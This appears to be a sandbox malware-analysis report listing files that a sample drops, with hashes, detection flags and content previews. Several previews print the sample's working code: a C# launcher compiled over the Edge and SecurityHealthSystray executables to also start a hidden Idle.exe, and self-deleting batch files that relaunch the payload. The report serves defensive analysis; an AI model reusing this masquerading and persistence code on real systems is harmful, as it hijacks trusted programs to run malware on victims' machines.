Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\msedge.exe.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1396
Entropy (8bit):	5.350961817021757
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
MD5:	EBB3E33FCCEC5303477CB59FA0916A28
SHA1:	BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
SHA-256:	DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
SHA-512:	663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\physmeme.exe.log

Download File

Process:	C:\Windows\Speech\physmeme.exe
File Type:	CSV text
Category:	modified
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\26AuZX4BQT

Download File

Process:	C:\Users\user\AppData\Local\Idle.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.373660689688185
Encrypted:	false
SSDEEP:	3:mBrIXuByMH:m+Q
MD5:	DF9FF341B171855E117F9872655EB4B8
SHA1:	541000CA38A44F5C0F1C2B42E520C1789857CEA9
SHA-256:	FEDB63F2EEFC23366038D6E34A6436174C9760C9F521880C91DB90C2883CDDB1
SHA-512:	E98F697C9DB5719EA6E837EE46A48D0A2D6CD8A3D57121389877F7EB0C33F5A7E712BDC9F4EEB85B59DD87ADCBA520C1E12C22E8547CE3ADC554D921BE361E23
Malicious:	false
Preview:	efAOKWpWcGMqDvfs578EHyWib

C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	4.972980984140053
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLAZc/EiFkD:JNVQIbSfhWLzIiFkMSfhscFkD
MD5:	FC0B7B0A98D93B3D19267386EBB8522D
SHA1:	81BB2F6A8BC7B0825E81544E09C00F5476852B80
SHA-256:	71C2E8E74DB9F514F469CDA3D3F0CCBB97145A24A7B027E7878A45C47133A5CA
SHA-512:	2349C072E3906226BE72C2D647328E15C736DCC14729F7C2B4C55C6099F4A3DC139C991A0D4BCBFC38CE0D0DED1F7FADD4B4D26B0783A13BA7D06C0FC5E2D3F2
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\Idle.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	269
Entropy (8bit):	5.1673139180347185
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23fG/O:Hu7L//TRRzscQlZ+/O
MD5:	C623731E643E3636B689320973693CC6
SHA1:	60ABDACD3711086F7F602A428E0D6CF262961973
SHA-256:	3FFE3BCD4E2EA8521A07606009EA2A0362474512B6700C7CA598756B2DFDDDC6
SHA-512:	8E743FAB6E27742E675A457527C697336B442E1E9F361E402CCC486C7CC7735D1E3630726FF2B1FC0F141E265564DDC75D772AF2EBE2F7AC964413643F8AD840
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.0.cs"

C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (333), with CRLF, CR line terminators
Category:	modified
Size (bytes):	754
Entropy (8bit):	5.264528207546698
Encrypted:	false
SSDEEP:	12:apI/u7L//TRRzscQlZ+/vKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzstDivKax5DqBVKVrdFAMBt
MD5:	0D1F5778D6502B5B2190575273FDB432
SHA1:	C17EB0AB67B0B1C3D41F19548613121EA52C7B2F
SHA-256:	3E1E712258A964EDC950C187E3CEF0F2DB2EDDC41BE4DE2A6736AE8892213488
SHA-512:	303F30523013EBBF190E22BE3F8E7FDDF4E1CA8E6F2D35632F8C630DE0050D45F07EE0764BD71ABE853A5DF7B8A5B1420815B69DC21A6F5B2AC9F577E7F40AEF
Malicious:	false
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\3htq1mnq\3htq1mnq.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\AntDRUzUoe.bat

Download File

Process:	C:\Users\user\AppData\Local\Idle.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.005246970377696
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9m10nacwRE2J5s/PBvBktKcKZG10nacwRE2J5xAIpRH:hCRLuVFOOr+DE1cNwi23s/pvKOZG1cNS
MD5:	45E05E440FAA19CE817E95A7541B90C1
SHA1:	7646478A21D0AF1DB118E1ADBF19F01DD1288BBC
SHA-256:	43A3E7965C3B10D0DD047F1BBC0E3E9770F2C721983EE4D34241CC84C6C00855
SHA-512:	81B8E00C0174C300D62562F0EF41AE2AD8F0B0D395F3BF1819B367F740DEBBE9DBEF56FA29F9065671AB0335CE5C0FF4D64836A395385CD30A29F8333C83DB33
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Users\user\AppData\Local\Idle.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\AntDRUzUoe.bat"

C:\Users\user\AppData\Local\Temp\CmSUPSwWTx.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	198
Entropy (8bit):	5.109115510110525
Encrypted:	false
SSDEEP:	3:mKDDVNGvT2XuFK+KdTVpM3No+HK9ATSV+jn9mF5XIvBktKcKZG10nacwRE2J5xAg:hCijTg3Nou1SV+DE74vKOZG1cNwi23fz
MD5:	640B0998E5745674DF0068D8B9A58C2E
SHA1:	3729305F15FD83A020786F32C30D9A1BCB1BCD7D
SHA-256:	C5E231E09AE82C150C6599EE7CB426736EEFD250F6ADD38F5D273776E7F2C7F5
SHA-512:	989FD727242288DAC0FA82434FD8C4983ED67294FC87A1BC37CBB0CC024493BA457FB03D97BF94B5EA4293604C324E879390E079C939D7F8B4FABEFD23E21865
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\CmSUPSwWTx.bat"

C:\Users\user\AppData\Local\Temp\RESBBC9.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c4, 10 symbols, created Mon Sep 30 20:15:27 2024, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1916
Entropy (8bit):	4.604424495301313
Encrypted:	false
SSDEEP:	24:Hte9s6Lzc84nZH5fwK80N6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+qcN:YLzMnZZoK80klmuulB+hnqXSfbNtmhP
MD5:	2E065C6622964602405EF566CF3291DB
SHA1:	B0CBED5A41022FAA441033D93D1FFB31525034F6
SHA-256:	52DC0B221182096785143C595D6EABFD598DE59ADDA826E55D410F6903EB16DE
SHA-512:	F1A191D657D9AB956EAB2372BAB74F25C274CBCE0A345D225133DC22DEB4E6BDCA8946EC6126E892451E125F17029FB2CB87F59FE4BF8BF5EF675BC4B77AEDB7
Malicious:	false
Preview:	L......f.............debug$S........L...................@..B.rsrc$01................x...........@..@.rsrc$02........8...................@..@........[....c:\Program Files (x86)\Microsoft\Edge\Application\CSC27CA14B1EE394F4E88C32D707E342A8F.TMP....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RESBBC9.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.

C:\Users\user\AppData\Local\Temp\RESBDCC.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6dc, 10 symbols, created Mon Sep 30 20:15:27 2024, 1st section name ".debug$S"
Category:	modified
Size (bytes):	1940
Entropy (8bit):	4.5484090185890755
Encrypted:	false
SSDEEP:	24:HFPW9xGOW8ZHlwK80NyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+AlUZ:5sXW8ZmK80MluOulajfqXSfbNtmhFZ
MD5:	452CD7408DB84ABD296557711E50A140
SHA1:	BB767B48D2900A899016477D3C54048B0D5D8DE3
SHA-256:	812A0FE776C97E9AEF1F331CEA97FA1F725D54B5BB6854D8A0371BED67A3DF66
SHA-512:	AB8FF7D6B7712C6784ADA371E7EDE7680892C9E33AE94DE02A795B07F557FA8ACDFA659A60C4137D68F2124D60723E2E842CB33B4FAA58FB689023828D05E8D1
Malicious:	false
Preview:	L......f.............debug$S........,...................@..B.rsrc$01................X...........@..@.rsrc$02........p...l...............@..@........:....c:\Windows\System32\CSC75DA780D41F148BEB3E8CF69CEFFE.TMP....................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RESBDCC.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.

C:\Users\user\AppData\Local\Temp\TkseHYIaPv.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	198
Entropy (8bit):	5.098014557178933
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE74vKOZG1cNwi23fRWH:HTg9uYDE3Z8H
MD5:	A673ABC330F63171A0F71F189F74BE9E
SHA1:	CDCF0FB2A113DE9B093E518F2317450715065C8F
SHA-256:	D980F0A040667D42F1C7060721F9C73DAEE6FF4B9344013D84D278AC7D27CDA7
SHA-512:	8C9F53A5D7B2B2151FABB496CB55CEBB8C6ADFDFC5D7DFE76488B5AE07BC8D590C9C10328A32B674A2E56B3019349D860E3CDED3637A1F1C21EF4EC18CBEB530
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\TkseHYIaPv.bat"

C:\Users\user\AppData\Local\Temp\WIcABxr4s2

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:ayfFwyPzLkn:aMzzLkn
MD5:	E229D7358FE4BA809FFEE2AB11789E41
SHA1:	75B143B840FA8EEC16C02A9CA75A76C62A163C54
SHA-256:	BCA084445B73867E09375DC28686E54F3BE63E844BFD3E847FCB1C524996B0F0
SHA-512:	6D4827B9333DDEAE607D4705185A2189BF357F4ABDB02AEB1ABE7BC3BD979553E5B7AED26788B50DDF4B9084D9C6B3714C5DF172047FAB9033E8334D235996FA
Malicious:	false
Preview:	40BKWzDHtoeUBWjVTDnjfJHfC

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2y0gzg4b.cnd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41qecmnv.brz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_asf3xjjx.522.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_be3nwach.yzh.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlq5gvxv.xxr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kinhymhz.y5m.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_valggtjy.nla.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wnj5esqh.wo5.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\dOSSRzu0nX

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:JDl3w3:JDl3w3
MD5:	56990D7EE02F08064B4CC5527FAAF1D4
SHA1:	4409497DFEA164492E7CD9AAE2AB2C1ECA14FAB1
SHA-256:	D891B5C64EE41706E99A257485E6A60F9B806C30F7F0B4E5EF567A8231278893
SHA-512:	9FEF655C0A06637E32B39EF75B3D81DF7EA69C4D9DDE035CCEAC85DFFBAFFFCF46004DD7D162C75029F66C666840BF6005CF45ACDDC5BCA3A5B062A3B4D0142B
Malicious:	false
Preview:	jZyQvfBy1Ht4Dee52ADfIIUV8

C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	388
Entropy (8bit):	4.95086143983048
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLAZc/EiFkD:JNVQIbSfhV7TiFkMSfhscFkD
MD5:	BC679215E0084B6A1E8582E54ACFBD63
SHA1:	C3C1446F2B18964BE4AAFD6156D01BDB4610BC48
SHA-256:	4482F553AF53DAC42F3D191F4ED1B9347512B70BE8A8D17F429AD74BDD61C6F8
SHA-512:	0ECF8237327C1CF697BB99FDA5799CCF777D75D83198B70FDB8C458250B48886E0A2F4B21293E6562DEC370C9F2DFD5C403F84C189F281E2790661CD60619A8E
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\Idle.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	254
Entropy (8bit):	5.090817987287188
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fhX45qLhx:Hu7L//TRq79cQlZJX9b
MD5:	AE9C7EBA69736E4AA21AA63629D461A9
SHA1:	273909E7AE0CE32620E28B86588F365990ADD49C
SHA-256:	362B1FA40F80D0E1B5E148CCB1103B066734C43E05A26164025C32D666AA1D8C
SHA-512:	CFDC866696B5DFD9E5CA2A18056BF5FC21F81FE8F03B4AA20C53DE36310B43A69221A04AD562DDFF7E723E89A725D0D7E170C3E1F72147C700B72BABAE72ADDB
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.0.cs"

C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (318), with CRLF, CR line terminators
Category:	modified
Size (bytes):	739
Entropy (8bit):	5.26099918429941
Encrypted:	false
SSDEEP:	12:apI/u7L//TRq79cQlZJX9aKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79tDOKax5DqBVKVrdFAMBJj
MD5:	4360C9430F4169B421263DE8636C8096
SHA1:	E7C9CCD19A93C231EE80E9D8AD9FE736C36A25F6
SHA-256:	DE5BEEA5AF7B922D22D1EF36847CAFB24FA70244B8E68144B3EC2E443BC4A110
SHA-512:	6F271F2E057B34E9B45F45DA7C1172970D07F03FAF9400010C580B2517AD0E8EDC8A1D0167D44D09335800A81E27F087513854FFB9BFCDAF093FB8E93BD3717E
Malicious:	false
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\f1yf2e0h\f1yf2e0h.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\ndC0udATSD.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	198
Entropy (8bit):	5.061918651686551
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE74vKOZG1cNwi23f3zS9h:HTg9uYDE3ZfzSr
MD5:	BDB242E60B6B3B5DB690E27EFC55FC70
SHA1:	87AD1B2B52C073BDF1EBEA42A86D2C2070D77927
SHA-256:	9942BD80526668D3F1AB5163E0E197DAE2A5F8E297B5EB9E71C9E20ACA634A7B
SHA-512:	BA946F12A1331DFCBAD9C5B1A4438F84151E6A5667A37495A94249265DAD18FCC0CAFDADEA8FC66EDDF793D43E8970E15589C4F80867F7154BFBDEAB6F388AF8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
